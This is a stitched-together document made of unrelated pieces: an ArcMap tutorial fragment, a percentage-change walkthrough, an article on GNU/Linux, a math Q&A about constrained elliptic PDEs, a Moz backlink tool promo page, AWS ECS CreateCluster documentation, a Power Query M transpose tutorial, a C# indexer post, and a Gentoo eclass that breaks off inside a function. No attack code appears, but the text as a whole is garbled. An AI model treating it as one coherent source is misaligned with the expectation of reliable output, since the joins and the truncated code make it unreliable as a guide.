Reload the Turn Chords layer, add the Middle Ordinate layer, and make Chuckanut Ridge Road the only selectable layer. Use Bookmark CR MP 0.0 1:3,000 to zoom to the south end of the road. Use the Turn Chords layer as a guide to select the first turn segment. Either open an editing session to manually assign turn numbers or use the Field Calculator to populate the Turn_No field. Notice that ArcMap labels the segment as the number is assigned. Continue assigning numbers to all 47 turns. Although these turns do not have to be numbered sequentially, it does help keep turn numbers straight.

Finish the Project

When finished assigning numbers, open the attribute table and sort the turn numbers in ascending order. To reinforce an important point from the original tutorial, join the lengths of the turn chord and middle ordinate to each road segment. Next, calculate the radius of each turn and thematically map each using the color ramp used in the original exercise. Save the finished project.

Summary

This exercise is an extension of "Under Construction: Building and Calculating Turn Radii" in this issue. It teaches how to derive endpoints for polyline segments and how to use the points to split one or more polylines into smaller segments. This workflow has many uses beyond transportation engineering.

Acknowledgments

The author thanks Esri's Technical Support team for helping develop and deploy this method.
An enhancement request has been submitted for this task and several related tasks that also surfaced while developing this exercise.
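The geometric core of Task 2 — pulling start and end coordinates off each chord — can be sketched without ArcGIS at all. The plain-Python stand-in below uses a hypothetical vertex-list representation of a polyline (in ArcMap the same values come from Calculate Geometry):

```python
def endpoint_fields(polyline):
    """Given a polyline as a list of (x, y) vertices, return the four
    endpoint attributes used in Task 2: Start_X, Start_Y, End_X, End_Y."""
    (sx, sy), (ex, ey) = polyline[0], polyline[-1]
    return {"Start_X": sx, "Start_Y": sy, "End_X": ex, "End_Y": ey}

# One hypothetical turn chord, vertices in State Plane feet:
chord = [(1223150.25, 648200.10), (1223201.40, 648312.75)]
print(endpoint_fields(chord))
```

Each resulting dictionary corresponds to one row of the Chord1_XY table built in Tasks 2 and 3.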
What is the percentage change (increase or decrease) from 5111 to 6335?

What is the % change from __ to __? 23.95%

How to solve this problem: a step-by-step guide

Calculating a percentage increase or decrease is a useful way to track how data changes over time. If you have two numbers, the relationship between them can be described by the percentage change between them. The reason this is an important measure is that it is normalized. Percentage increases and decreases can be a little confusing at first, but become much simpler once you understand how they are calculated.

To calculate the percentage change, we will use three operations. As usual with percentage problems, these operations involve basic arithmetic. In this case, we want to calculate the percentage increase or decrease from 5111 to 6335. Here are the steps:

Step 1: Subtract 5111 from 6335

The first step is to find the difference between the new number (the second input, 6335) and the old number (the first input, 5111). We can do this simply by subtracting 5111 from 6335:

$$ 6335 - 5111 = 1224 $$

Step 2: Divide 1224 by 5111

The second step is to divide the result of step 1 by the original number. This is done in order to compare the difference with the original number. The equation for this is simply:

$$ \frac{1224}{5111} = 1224 \div 5111 = 0.23948346703189 $$

Step 3: Multiply 0.23948346703189 by 100

The last step of this calculation is to multiply the result of step 2 by 100 to turn it into a percentage (%). This equation is quite simple:

$$ 0.23948346703189 \times 100 = 23.95 $$

And there you have it! These three steps can be used to calculate the percentage increase or decrease between two numbers. Try it with another pair of numbers.
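The three steps translate directly into code. A minimal sketch (the function name is my own):

```python
def percent_change(old: float, new: float) -> float:
    """Percentage increase (+) or decrease (-) from old to new."""
    # Step 1: difference; Step 2: divide by the original; Step 3: scale to %.
    return round((new - old) / old * 100, 2)

print(percent_change(5111, 6335))  # 23.95
```

The same function reports decreases as negative values, e.g. percent_change(100, 50) gives -50.0.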
What Is GNU In GNU/Linux?

We have been using a lot of free and open source software, and often this software is licensed under the GNU GPL. Our very famous Linux project, the base for tens of modern operating systems, is itself licensed under the GPL and is often called GNU/Linux, as it uses mostly software licensed under GNU.

What is GNU?

GNU is an operating system and an extensive collection of free and open source software, all of which is licensed under the GPL (General Public License). A lot of people get confused by the full form of GNU. Well, the full form of GNU is "GNU's Not Unix". Yes, this is not a typing error; you read it right. It is a recursive acronym and has no further meaning. However, an animal called the wildebeest is in some places called a gnu, hence it was chosen as the official mascot for GNU.

How GNU started

Until the '70s, software was often shared among people, and developers would see each other's code and often modify each other's software. This golden era didn't last long, and by the early '80s the term "proprietary software" had been coined. Most software became proprietary, and it became impossible to freely study or modify it.

Richard Stallman started the GNU project in 1983 with a view to creating and distributing software that could be used freely by anyone around the world. He wanted to create a fully free operating system that had components and software which were freely available to the general public. Stallman wanted an environment where users could use, understand and modify the source code, and even distribute modified versions of the same. This was later published as the GNU Manifesto.

GNU vs. GNU/Linux

So GNU is an operating system and Linux is a kernel. Both of them are based on UNIX. GNU has its own environment with the GNU OS and the GNU tools. Linux, on the other hand, is just a kernel, and users rely on GNU tools and software to interact with it.
When you are using Bash on your Linux desktop, you are using GNU software, compiled with GNU compilers, running on the Linux kernel.

The Naming Controversy

There has always been a controversy over whether Linux should be called GNU/Linux or just plain Linux. The reason is that GNU promoters believe that GNU was already a complete system and the Linux kernel merely filled the void, becoming a very famous kernel; since most Linux software comes under GNU, the system should be called GNU/Linux. However, some Linux enthusiasts side with the view that it should be called Linux only.

Conclusion

Richard Stallman created the GNU project, and that work led to the fame and popularity of Linux-based operating systems as we know them today. The GNU project is complete, with every tool needed to create and run software, from compilers and editors to utility programs. GNU/Linux is often used for Linux as a whole system using the Linux kernel and GNU tools. You can read more about Richard Stallman in our article here.
1
$\begingroup$

Edit: I just learned that all weak solutions are $C^\infty$, so this question, by Willie, seems more appropriate than the current one.

I want to find weak, non-trivial, continuous solutions of
$$\Delta u - \lambda u = 0$$
for a square domain in $\mathbb{R}^N$, $N \ge 2$, under periodic boundary conditions, and under the added constraint that the weak solutions $u$ should take given values at a given finite set of points in the interior of the domain: $u(x_i) = d_i$, where the $x_i$ lie in the interior of the domain and the $d_i$ are reals.

Reference request: has someone already solved this, partially solved it, or done any relevant work? I am trying to solve it, and I want to know whether it makes sense and that I am not re-inventing the wheel or barking up the wrong tree.

PS: By solving, I mean having a numerical solution that converges pointwise to the actual solution.

$\endgroup$

0

1
$\begingroup$

This is a very interesting problem, and I also wondered about these discrete conditions a while ago. This is more of a comment/suggestion.

Firstly, keeping in mind the well-posedness of elliptic PDEs, I would start working with the case $\lambda \geq 0$, and to make things easier, with a Dirichlet boundary. A periodic boundary wouldn't be very different: we would then have to consider the points on the boundary of the given space to also be active nodes. But there is a subtle problem here: how do we define the connectivities of these nodes with the other boundary nodes? By taking the nodes from the interior near one boundary, placing them at the same spacing on the empty side of the opposite periodic boundary, like ghost points, and then making the connectivities.

Second, taking the conditions to be satisfied internally also as boundary conditions, we have a domain with "holes" (even then it is a connected domain) and it is a Lipschitz domain, so the Lax-Milgram theorem can be applied, resulting in a well-posed problem.
I am pretty sure the solution in our case would be continuous and have weak derivatives, from the well-posedness of the variational form. I am not sure about elliptic regularity, possibly because of the "holes", but I feel it should hold as well!?

Third, for the numerical solution, I would start working with conforming FEM or the Ritz-Galerkin method, but making sure our discretization or triangulation of the space is such that these given points are nodes and not internal to triangles (let's call them special nodes), so that the method is conforming and the related conditions can be easily applied. Now for simplicity, if we take only a linear basis, we write the numerical solution in terms of the basis of hat functions, and note that the special nodes also have associated hat functions whose coefficients are known from the given conditions and can be put on the RHS. The unknowns would correspond to the rest of the nodes, and a system of the required size can be formed by testing with the remaining hat functions. And if the triangulation is refined conformally (i.e., the special nodes remain nodes and never become internal to triangles), I would expect convergence similar to that of the general advection-diffusion problem. Although the abstraction is the same, it would get complicated to implement in the higher-dimensional case, as is usually true.

Regarding references: I searched for these "hole" kinds of Dirichlet boundaries but didn't find anything!

$\endgroup$
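A one-dimensional toy version of this construction is easy to prototype. The sketch below (all names and values are mine; a finite-difference stencil stands in for the linear hat-function system, to which it is equivalent on a uniform 1-D mesh) solves u'' - λu = 0, treating boundary nodes and interior "special nodes" alike as pinned values:

```python
def solve_pinned(n, lam, pinned):
    """Solve u'' - lam*u = 0 on [0, 1] with n+1 uniform grid nodes.
    `pinned` maps node index -> prescribed value; it must include the
    boundary nodes 0 and n, plus any interior constraint nodes."""
    h = 1.0 / n
    # Dense system A u = b, with trivial rows for pinned nodes.
    A = [[0.0] * (n + 1) for _ in range(n + 1)]
    b = [0.0] * (n + 1)
    for i in range(n + 1):
        if i in pinned:
            A[i][i], b[i] = 1.0, pinned[i]
        else:  # (u[i-1] - 2u[i] + u[i+1]) / h^2 - lam*u[i] = 0
            A[i][i - 1] = A[i][i + 1] = 1.0 / h ** 2
            A[i][i] = -2.0 / h ** 2 - lam
    # Gaussian elimination with partial pivoting.
    for c in range(n + 1):
        p = max(range(c, n + 1), key=lambda r: abs(A[r][c]))
        A[c], A[p] = A[p], A[c]
        b[c], b[p] = b[p], b[c]
        for r in range(c + 1, n + 1):
            f = A[r][c] / A[c][c]
            b[r] -= f * b[c]
            for k in range(c, n + 1):
                A[r][k] -= f * A[c][k]
    # Back substitution.
    u = [0.0] * (n + 1)
    for r in range(n, -1, -1):
        s = sum(A[r][k] * u[k] for k in range(r + 1, n + 1))
        u[r] = (b[r] - s) / A[r][r]
    return u

# Dirichlet boundary plus one interior "hole" condition u(0.5) = 2:
u = solve_pinned(20, lam=1.0, pinned={0: 0.0, 10: 2.0, 20: 0.0})
```

The interior constraint is imposed exactly at its node, matching the suggestion above that the special nodes be mesh nodes rather than points interior to elements.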
Moz Backlink Checker

Enter a URL
Max Backlinks to Find
Captcha

About Moz Backlink Checker

Moz Backlink Checker's Significance for Search Engine Optimization

As a digital marketer, you must be aware of the significance of backlinks in search engine optimization. Without quality backlinks, it is not possible for any online business to compete. A backlink is basically an incoming hyperlink from a third-party website: the link to a particular webpage, web directory, or entire website is posted on another website as a hyperlink. These hyperlinks are generally created in guest posts and blogs containing some meaningful information. Generally, we prefer high-traffic websites for backlinking purposes, because the probability of diverting their traffic to your website is higher. In short, you can consider backlinking the most effective and evergreen strategy for increasing traffic and conversion. Moreover, backlinks are also helpful in improving the footprint of a website on the World Wide Web. More backlinks on highly ranked websites mean Google will recognize your site as a trusted domain.

Not all the backlinks that you create are genuine. Some of the domains where you put your backlinks may contain malicious content. Rather than promotion, backlinks on such websites result in a drastic drop in ranking. Google crawlers regularly check the entire content of your web pages. If they find any kind of malicious activity regarding the backlinks, your ranking will go down. Now, the question is: how do you identify the quality of backlinks? It is possible with the help of the Moz backlink checker tool. In the article below, we will look in detail at the features of this useful tool and its significance in search engine optimization.

What is Moz Backlink Checker?
This online tool is capable of examining and showing the quality of inbound links, taking into account factors like spam score, page authority, and domain authority. A good amount of backlink research is possible with its free version, but the premium version enables you to use more sophisticated built-in tools for improving your search engine ranking. The final results of this tool help you understand the efficiency of a web page in influencing online visitors. You can check the backlinking data not only for your website but also for competitors. It is a great advantage for marketers who are struggling hard to stay ahead of the competition. From the overview above, it is clear that the Moz backlink checker tool has great significance for digital marketers. Now, you are going to understand its usefulness in detail.

Why do we need the Moz Backlink Checker tool?

1. Checking the backlinks to any website

The backlink checker tool allows you to understand the current ranking of your website. From the beginning of your digital marketing practice to the current time, you or other marketers must have created a lot of backlinks. This tool is capable of examining every single link and bringing you a valuable result.

2. Comparison with competitor backlinks

Every marketer wants to know the strategies of competitors. It is unlikely that you are the only player in online trading in a particular market segment. A lot of competitors will already be struggling hard to stay ahead in terms of ranking. Backlinks play a key role in affecting search engine results. You can enter the URL of a competitor's domain in the Moz backlink checker tool to identify the strategies of competitors. All of their backlinks will appear in the report along with their quality. After studying this analytical report, you can also target the same sites for backlinking purposes.

3. Identifying links

The Moz backlink checker tool critically analyses every single backlink.
It is possible that some of them are broken, lost, or just newly introduced. It is very important to identify the broken links because they are badly affecting your ranking. After identifying them, you can use a broken-link builder tool to reproduce the content of broken links. If you have lost a backlink due to relocation or removal of that particular page, contact the website owner and request a new backlink.

4. Analyze the domain authority score

This tool is capable of identifying both good and bad backlinks. There is no need to check the domain authority of a website with separate tools, because you will find a sophisticated DA checker built in. You can classify the high-domain-authority links separately from inferior spammy links. It also calculates the spam score of a website to warn you about its long-run reliability. If your backlink is on a website containing spam, the crawlers will surely identify it and decrease your ranking.

5. Identifying the top-performing backlink content

As a marketer, you always need to identify the content containing backlinks that deliver maximum traffic to your website. It is obvious that some backlinks perform better than others because of several factors, such as the domain authority of the hosting website, the quality of content, and the use of relevant keywords. The Moz backlink checker organizes all the backlinks in a table according to their performance. You can examine the top performers to learn why they are better than others. This helps in making further strategies for effective search engine optimization.

Importance of the Moz Backlink Checker tool

1. Optimum utilization of resources

With the help of the Moz backlink checker tool, you can optimally utilize all available resources. It gathers and organizes the entire backlink information in a manner that lets one easily identify the most valuable backlinks. Information like top performers, broken links, and lost links can help in making all necessary changes in a timely manner.
In this way, you can utilize the maximum possible potential of every single backlink.

2. Staying ahead of the competition

Generate critical analytical backlink reports for all competitors with this tool and compare them with your website. They can clearly show where you are lagging and why competitors' rankings are higher. After a comparative study, you will discover more link-building opportunities. Try to approach the backlink providers with higher domain authorities; the addresses of such websites are easy to find in the reports of competitors' backlinks.

How does the Moz Backlink Checker tool work?

1. First of all, note that you do not need to create an account on the Moz backlink checker website. It is completely free of cost.
2. An interface will appear where you can enter any URL, including one that belongs to a competitor's website. Then select the number of backlinks to be extracted, and finally complete the captcha code before clicking the submit button.
3. Once you execute the command for searching backlinks, the tool generates the backlink data.
4. Now compare it with your website's backlinks to identify the areas where improvement is necessary.

Advantages of the Moz Backlink Checker Tool

As per the current scenario, you cannot expect success from any search engine optimization campaign without the help of the Moz backlink checker. This powerful tool is capable of revealing all possible opportunities as well as helping you identify good-quality backlinks.
CreateCluster - Amazon Elastic Container Service CreateCluster Creates a new Amazon ECS cluster. By default, your account receives a default cluster when you launch your first container instance. However, you can create your own cluster with a unique name with the CreateCluster action. Note When you call the CreateCluster API operation, Amazon ECS attempts to create the Amazon ECS service-linked role for your account so that required resources in other AWS services can be managed on your behalf. However, if the IAM user that makes the call does not have permissions to create the service-linked role, it is not created. For more information, see Using Service-Linked Roles for Amazon ECS in the Amazon Elastic Container Service Developer Guide. Request Syntax { "capacityProviders": [ "string" ], "clusterName": "string", "configuration": { "executeCommandConfiguration": { "kmsKeyId": "string", "logConfiguration": { "cloudWatchEncryptionEnabled": boolean, "cloudWatchLogGroupName": "string", "s3BucketName": "string", "s3EncryptionEnabled": boolean, "s3KeyPrefix": "string" }, "logging": "string" } }, "defaultCapacityProviderStrategy": [ { "base": number, "capacityProvider": "string", "weight": number } ], "settings": [ { "name": "string", "value": "string" } ], "tags": [ { "key": "string", "value": "string" } ] } Request Parameters For information about the parameters that are common to all actions, see Common Parameters. The request accepts the following data in JSON format. capacityProviders The short name of one or more capacity providers to associate with the cluster. A capacity provider must be associated with a cluster before it can be included as part of the default capacity provider strategy of the cluster or used in a capacity provider strategy when calling the CreateService or RunTask actions. If specifying a capacity provider that uses an Auto Scaling group, the capacity provider must already be created and not already associated with another cluster. 
New Auto Scaling group capacity providers can be created with the CreateCapacityProvider API operation. To use an AWS Fargate capacity provider, specify either the FARGATE or FARGATE_SPOT capacity providers. The AWS Fargate capacity providers are available to all accounts and only need to be associated with a cluster to be used. The PutClusterCapacityProviders API operation is used to update the list of available capacity providers for a cluster after the cluster is created.

Type: Array of strings
Required: No

clusterName

The name of your cluster. If you do not specify a name for your cluster, you create a cluster named default. Up to 255 letters (uppercase and lowercase), numbers, and hyphens are allowed.

Type: String
Required: No

configuration

The execute command configuration for the cluster.

Type: ClusterConfiguration object
Required: No

defaultCapacityProviderStrategy

The capacity provider strategy to set as the default for the cluster. When a default capacity provider strategy is set for a cluster, when calling the RunTask or CreateService APIs with no capacity provider strategy or launch type specified, the default capacity provider strategy for the cluster is used. If a default capacity provider strategy is not defined for a cluster during creation, it can be defined later with the PutClusterCapacityProviders API operation.

Type: Array of CapacityProviderStrategyItem objects
Required: No

settings

The setting to use when creating a cluster. This parameter is used to enable CloudWatch Container Insights for a cluster. If this value is specified, it will override the containerInsights value set with PutAccountSetting or PutAccountSettingDefault.

Type: Array of ClusterSetting objects
Required: No

tags

The metadata that you apply to the cluster to help you categorize and organize them. Each tag consists of a key and an optional value, both of which you define.
The following basic restrictions apply to tags: • Maximum number of tags per resource - 50 • For each resource, each tag key must be unique, and each tag key can have only one value. • Maximum key length - 128 Unicode characters in UTF-8 • Maximum value length - 256 Unicode characters in UTF-8 • If your tagging schema is used across multiple services and resources, remember that other services may have restrictions on allowed characters. Generally allowed characters are: letters, numbers, and spaces representable in UTF-8, and the following characters: + - = . _ : / @. • Tag keys and values are case-sensitive. • Do not use aws:, AWS:, or any upper or lowercase combination of such as a prefix for either keys or values as it is reserved for AWS use. You cannot edit or delete tag keys or values with this prefix. Tags with this prefix do not count against your tags per resource limit. Type: Array of Tag objects Array Members: Minimum number of 0 items. Maximum number of 50 items. Required: No Response Syntax { "cluster": { "activeServicesCount": number, "attachments": [ { "details": [ { "name": "string", "value": "string" } ], "id": "string", "status": "string", "type": "string" } ], "attachmentsStatus": "string", "capacityProviders": [ "string" ], "clusterArn": "string", "clusterName": "string", "configuration": { "executeCommandConfiguration": { "kmsKeyId": "string", "logConfiguration": { "cloudWatchEncryptionEnabled": boolean, "cloudWatchLogGroupName": "string", "s3BucketName": "string", "s3EncryptionEnabled": boolean, "s3KeyPrefix": "string" }, "logging": "string" } }, "defaultCapacityProviderStrategy": [ { "base": number, "capacityProvider": "string", "weight": number } ], "pendingTasksCount": number, "registeredContainerInstancesCount": number, "runningTasksCount": number, "settings": [ { "name": "string", "value": "string" } ], "statistics": [ { "name": "string", "value": "string" } ], "status": "string", "tags": [ { "key": "string", "value": "string" } ] } } 
Response Elements If the action is successful, the service sends back an HTTP 200 response. The following data is returned in JSON format by the service. cluster The full description of your new cluster. Type: Cluster object Errors For information about the errors that are common to all actions, see Common Errors. ClientException These errors are usually caused by a client action, such as using an action or resource on behalf of a user that doesn't have permissions to use the action or resource, or specifying an identifier that is not valid. HTTP Status Code: 400 InvalidParameterException The specified parameter is invalid. Review the available parameters for the API request. HTTP Status Code: 400 ServerException These errors are usually caused by a server issue. HTTP Status Code: 500 Examples In the following example or examples, the Authorization header contents (AUTHPARAMS) must be replaced with an AWS Signature Version 4 signature. For more information, see Signature Version 4 Signing Process in the AWS General Reference. You only need to learn how to sign HTTP requests if you intend to create them manually. When you use the AWS Command Line Interface (AWS CLI) or one of the AWS SDKs to make requests to AWS, these tools automatically sign the requests for you, with the access key that you specify when you configure the tools. When you use these tools, you don't have to sign requests yourself. Example This example request creates a cluster called My-cluster. 
Sample Request

POST / HTTP/1.1
Host: ecs.us-east-1.amazonaws.com
Accept-Encoding: identity
Content-Length: 29
X-Amz-Target: AmazonEC2ContainerServiceV20141113.CreateCluster
X-Amz-Date: 20150429T163840Z
Content-Type: application/x-amz-json-1.1
Authorization: AUTHPARAMS

{
  "clusterName": "My-cluster"
}

Sample Response

HTTP/1.1 200 OK
Server: Server
Date: Wed, 29 Apr 2015 16:38:41 GMT
Content-Type: application/x-amz-json-1.1
Content-Length: 209
Connection: keep-alive
x-amzn-RequestId: 123a4b56-7c89-01d2-3ef4-example5678f

{
  "cluster": {
    "activeServicesCount": 0,
    "clusterArn": "arn:aws:ecs:us-east-1:012345678910:cluster/My-cluster",
    "clusterName": "My-cluster",
    "pendingTasksCount": 0,
    "registeredContainerInstancesCount": 0,
    "runningTasksCount": 0,
    "status": "ACTIVE"
  }
}

See Also

For more information about using this API in one of the language-specific AWS SDKs, see the following:
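As a quick illustration of consuming this response, the sample body above can be parsed and sanity-checked with plain JSON handling (this is not an AWS SDK call; the response string is copied from the example):

```python
import json

sample_response = '''
{
  "cluster": {
    "activeServicesCount": 0,
    "clusterArn": "arn:aws:ecs:us-east-1:012345678910:cluster/My-cluster",
    "clusterName": "My-cluster",
    "pendingTasksCount": 0,
    "registeredContainerInstancesCount": 0,
    "runningTasksCount": 0,
    "status": "ACTIVE"
  }
}
'''

cluster = json.loads(sample_response)["cluster"]

# A newly created cluster should come back ACTIVE with no workloads yet.
assert cluster["status"] == "ACTIVE"
assert cluster["runningTasksCount"] == 0

# The cluster name is the last path segment of the ARN.
name_from_arn = cluster["clusterArn"].split("/")[-1]
```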
Transposing rows and columns with List.Transform(Many)()

Besides Table.Transpose() and List.Zip(), List.TransformMany() can also swap rows and columns, although the code is not quite as concise.

If you want to add row totals and column totals to the table above, converting it into the totals table shown, you first need to define the following fnAddSum() function:

( input as list ) as list ⇒
let
    Outcome = List.Transform( input, each List.Combine( { _, { List.Sum( _ ) } } ) )
in
    Outcome

This function uses List.Transform() to walk through every list inside input and appends one element to the end of each list: the sum of that list's original elements.

To swap rows and columns, define the following fnTranspose() function:

( input as list ) as list ⇒
let
    Outcome = List.TransformMany(
        { input },
        each List.Numbers( 0, List.Count( _{0} ) ),
        ( x, y ) ⇒ List.Transform( x, each _{y} )
    )
in
    Outcome

The backbone of fnTranspose() is List.TransformMany(). If the list this function produces is passed to List.Count(), the result equals the product of List.Count() applied to its first argument and List.Count() applied to its second argument. To build the structure required by the first argument of Table.FromRows() or Table.FromColumns(), one of the first two arguments of List.TransformMany() must yield 1 when passed to List.Count(), while the other must yield the table's row count or column count. In fnTranspose(), the first argument wraps input in an extra pair of braces {}, so List.Count() of the first argument is 1. The list built by the second argument has exactly as many elements as there are rows (or columns), which prepares the third argument to walk through the elements that sit in the same row or column. It is worth mentioning that fnTranspose() can also be built around List.Transform():

( input as list ) as list ⇒
let
    Outcome = List.Transform(
        List.Numbers( 0, List.Count( input{0} ) ),
        (y) ⇒ List.Transform( input, (x) ⇒ x{y} )
    )
in
    Outcome

Building fnTranspose() with List.Transform() closely resembles a For..Next nested inside another For..Next in VBA: the outer List.Transform() controls the rows (or columns), while the inner List.Transform() controls the corresponding columns (or rows).

Finally, to restore the data types lost along the way, define the fnDataType() function:

( input as table, datatype as type ) as table ⇒
let
    Outcome = Table.TransformColumnTypes(
        input,
        List.TransformMany(
            Table.ColumnNames( input ),
            each { datatype },
            ( x, y ) ⇒ { x, y }
        )
    )
in
    Outcome

To understand this function, note that the first argument of List.TransformMany() calls Table.ColumnNames(), whose result passed to List.Count() equals the number of columns, and that the second argument is a single-element list, so the result of List.TransformMany() has exactly as many elements as there are columns (columns = columns × 1).

Here is the conversion starting from the columns:

let
    ToCols = Table.ToColumns( DB ),
    SumByCols = fnAddSum( ToCols ),
    Transpose = fnTranspose( SumByCols ),
    SumByRows = fnAddSum( Transpose ),
    ToTable = Table.FromRows( SumByRows ),
    DataType = fnDataType( ToTable, Number.Type )
in
    DataType

And here is the conversion starting from the rows:

let
    ToRows = Table.ToRows( DB ),
    SumByRows = fnAddSum( ToRows ),
    Transpose = fnTranspose( SumByRows ),
    SumByCols = fnAddSum( Transpose ),
    ToTable = Table.FromColumns( SumByCols ),
    DataType = fnDataType( ToTable, Number.Type )
in
    DataType

4 Replies to "Transposing rows and columns with List.Transform(Many)()"

1. Thank you for the excellent write-up! In the article, "( input as table, datatype as type ) as table ⇒" could be changed to "( input as table ) as table ⇒". Is my view sound? Please advise!
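Postscript: for readers coming from Python, the same pipeline — append row sums, transpose, append column sums — looks like this (an illustrative translation of the M code above, not part of the original post):

```python
def add_sum(rows):
    """Append the sum of each inner list to that list (fnAddSum)."""
    return [row + [sum(row)] for row in rows]

def transpose(rows):
    """Swap rows and columns (fnTranspose)."""
    return [[row[i] for row in rows] for i in range(len(rows[0]))]

db = [[1, 2], [3, 4]]
with_row_sums = add_sum(db)            # [[1, 2, 3], [3, 4, 7]]
flipped = transpose(with_row_sums)     # [[1, 3], [2, 4], [3, 7]]
with_col_sums = add_sum(flipped)       # [[1, 3, 4], [2, 4, 6], [3, 7, 10]]
```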
Monday, June 25, 2007

Indexer in C#

Indexers allow you to index a class or a struct instance in the same way as an array. The syntax is:

[modifier] [return type] this [argument list]
{
    get
    {
        // code for get accessor
    }
    set
    {
        // code for set accessor
    }
}

Here is the C# code:

public class PersonIndexer
{
    int[] _age = new int[2];
    string[,] _name = new string[2, 2];

    public int this[int i]
    {
        get { return _age[i]; }
        set { _age[i] = value; }
    }

    public string this[int i, int j]
    {
        get { return _name[i, j]; }
        set { _name[i, j] = value; }
    }
}

static void Main()
{
    PersonIndexer Ind = new PersonIndexer();
    Ind[0] = 30;
    Ind[1] = 40;
    Ind[0, 0] = "sanjay";
    Ind[0, 1] = "saini";
    Ind[1, 0] = "Ram";
    Ind[1, 1] = "Kumar";
    MessageBox.Show(Ind[0, 0] + " " + Ind[0, 1] + " is " + Convert.ToString(Ind[0]) + " yrs. old.");
    MessageBox.Show(Ind[1, 0] + " " + Ind[1, 1] + " is " + Convert.ToString(Ind[1]) + " yrs. old.");
}

Note:
1. If you declare more than one indexer in the same class, they must have different signatures.
2. They cannot be static.
3. They can also be inherited.
4. They can be overridden in the derived class and exhibit polymorphism.
5. They can be declared abstract in the class.

Reference: http://www.csharphelp.com/archives/archive140.html
eclass/enlightenment.eclass (Gentoo CVS)
Revision 1.106 - Fri Jul 11 08:21:58 2014 UTC, by ulm
Branch: MAIN, CVS Tags: HEAD
Changes since 1.105: +4 -4 lines — Avoid reserved names for functions and variables, bug 516092.

# Copyright 1999-2014 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/eclass/enlightenment.eclass,v 1.105 2013/10/12 15:30:23 aballier Exp $

# @ECLASS: enlightenment.eclass
# @MAINTAINER:
# [email protected]
# @BLURB: simplify enlightenment package management

if [[ -z ${_ENLIGHTENMENT_ECLASS} ]]; then
_ENLIGHTENMENT_ECLASS=1

inherit eutils libtool

# @ECLASS-VARIABLE: E_PYTHON
# @DEFAULT_UNSET
# @DESCRIPTION:
# if defined, the package is based on Python/distutils

# @ECLASS-VARIABLE: E_CYTHON
# @DEFAULT_UNSET
# @DESCRIPTION:
# if defined, the package is Cython bindings (implies E_PYTHON)

# @ECLASS-VARIABLE: E_ECONF
# @DESCRIPTION:
# Array of flags to pass to econf (obsoletes MY_ECONF)
E_ECONF=()

# E_STATE's:
#   release [default]
#       KEYWORDS arch
#       SRC_URI  $P.tar.gz
#       S        $WORKDIR/$P
#
#   snap $PV has .200##### datestamp or .### counter
#       KEYWORDS ~arch
#       SRC_URI  $P.tar.bz2
#       S        $WORKDIR/$P
#
#   live $PV has a 9999 marker
#       KEYWORDS ""
#       SRC_URI  svn/etc...
#       S        $WORKDIR/$E_S_APPEND
#
# Overrides:
#   KEYWORDS EKEY_STATE
#   SRC_URI  EURI_STATE
#   S        EURI_STATE

E_LIVE_SERVER_DEFAULT_SVN="http://svn.enlightenment.org/svn/e/trunk"
E_LIVE_SERVER_DEFAULT_GIT="git://git.enlightenment.org"

E_STATE="release"
if [[ ${PV} == *9999* ]] ; then
    if [[ ${EGIT_URI_APPEND} ]] ; then
        E_LIVE_SERVER=${E_LIVE_SERVER:-${E_LIVE_SERVER_DEFAULT_GIT}}
        EGIT_URI_APPEND=${EGIT_URI_APPEND:-${PN}}
        EGIT_PROJECT="enlightenment/${EGIT_SUB_PROJECT}/${EGIT_URI_APPEND}"
        EGIT_REPO_URI=${EGIT_SERVER:-${E_LIVE_SERVER_DEFAULT_GIT}}/${EGIT_SUB_PROJECT}/${EGIT_URI_APPEND}.git
        E_S_APPEND=${EGIT_URI_APPEND}
        E_LIVE_SOURCE="git"
        inherit git-2
    else
        E_LIVE_SERVER=${E_LIVE_SERVER:-${E_LIVE_SERVER_DEFAULT_SVN}}

        ESVN_URI_APPEND=${ESVN_URI_APPEND:-${PN}}
        ESVN_PROJECT="enlightenment/${ESVN_SUB_PROJECT}"
        ESVN_REPO_URI=${ESVN_SERVER:-${E_LIVE_SERVER_DEFAULT_SVN}}/${ESVN_SUB_PROJECT}/${ESVN_URI_APPEND}
        E_S_APPEND=${ESVN_URI_APPEND}
        E_LIVE_SOURCE="svn"
        inherit subversion
    fi
    E_STATE="live"
    WANT_AUTOTOOLS="yes"

elif [[ -n ${E_SNAP_DATE} ]] ; then
    E_STATE="snap"
else
    E_STATE="release"
fi

# Parse requested python state
: ${E_PYTHON:=${E_CYTHON}}
if [[ -n ${E_PYTHON} ]] ; then
    PYTHON_DEPEND="2"

    inherit python
fi

if [[ ${WANT_AUTOTOOLS} == "yes" ]] ; then
    WANT_AUTOCONF=${E_WANT_AUTOCONF:-latest}
    WANT_AUTOMAKE=${E_WANT_AUTOMAKE:-latest}
    inherit autotools
fi

ENLIGHTENMENT_EXPF="src_unpack src_compile src_install"
case "${EAPI:-0}" in
2|3|4|5) ENLIGHTENMENT_EXPF+=" src_prepare src_configure" ;;
*) ;;
esac
EXPORT_FUNCTIONS ${ENLIGHTENMENT_EXPF}

DESCRIPTION="A DR17 production"
HOMEPAGE="http://www.enlightenment.org/"
if [[ -z ${SRC_URI} ]] ; then
    case ${EURI_STATE:-${E_STATE}} in
    release) SRC_URI="mirror://sourceforge/enlightenment/${P}.tar.gz";;
    snap)    SRC_URI="http://download.enlightenment.org/snapshots/${E_SNAP_DATE}/${P}.tar.bz2";;
    live)    SRC_URI="";;
    esac
fi

LICENSE="BSD"
SLOT="0"
case ${EKEY_STATE:-${E_STATE}} in
release) KEYWORDS="alpha amd64 arm hppa ia64 ~mips ppc ppc64 sh sparc x86 ~amd64-fbsd ~x86-fbsd ~amd64-linux ~x86-linux ~ppc-macos ~x86-macos ~x86-interix ~x86-solaris ~x64-solaris";;
snap)    KEYWORDS="~alpha ~amd64 ~arm ~hppa ~ia64 ~mips ~ppc ~ppc64 ~sh ~sparc ~x86 ~amd64-fbsd ~x86-fbsd ~amd64-linux ~x86-linux ~ppc-macos ~x86-macos ~x86-interix ~x86-solaris ~x64-solaris";;
live)    KEYWORDS="";;
esac
IUSE="nls doc"

DEPEND="doc? ( app-doc/doxygen )
    ${E_PYTHON:+>=dev-python/setuptools-0.6_rc9}
    ${E_CYTHON:+>=dev-python/cython-0.12.1}"
RDEPEND="nls? ( sys-devel/gettext )"

case ${EURI_STATE:-${E_STATE}} in
release) S=${WORKDIR}/${P};;
snap)    S=${WORKDIR}/${P};;
live)    S=${WORKDIR}/${E_S_APPEND};;
esac

enlightenment_src_unpack() {
    if [[ ${E_STATE} == "live" ]] ; then
